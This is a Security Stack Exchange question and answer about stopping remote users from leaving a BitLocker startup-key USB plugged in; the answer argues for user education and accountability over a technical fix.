205,200 | I'm looking at setting up secure laptops using BitLocker with a pre-boot PIN and startup key. I'm wondering if there is a way to force the user, who is remote, to remove the USB with the startup key before they can log on or use Windows. Otherwise, what's to keep the user from just leaving the USB connected all the time, which would pretty much negate its value? One way, of course, is to make it impractical for the user to leave the USB connected, like permanently attaching it to a large object. But that's also generally impractical and not a great solution. Is there a solution or standard approach for this that can actually force the removal of the device? | You are trying to use a technical tool to solve a social problem, and the two do not fit. Technology can provide great security when correctly used, but only user education can ensure proper use. I often like the "who is responsible for what" question: users should know that they will be held accountable for anything done with their credentials. It is not enough for them to prove that they did not do it; they must prove that they correctly protected their credentials. A physical analogy can also help: they would not leave the key to a physical safe unattended, and they should understand that reasonably secured credentials are to be treated like a physical key and handled the same way. But since they are used to their own home computer with no security at all, education is hard and the message has to be repeated. Unfortunately, I have never found a better way... | {
"source": [
"https://security.stackexchange.com/questions/205200",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/167861/"
]
} |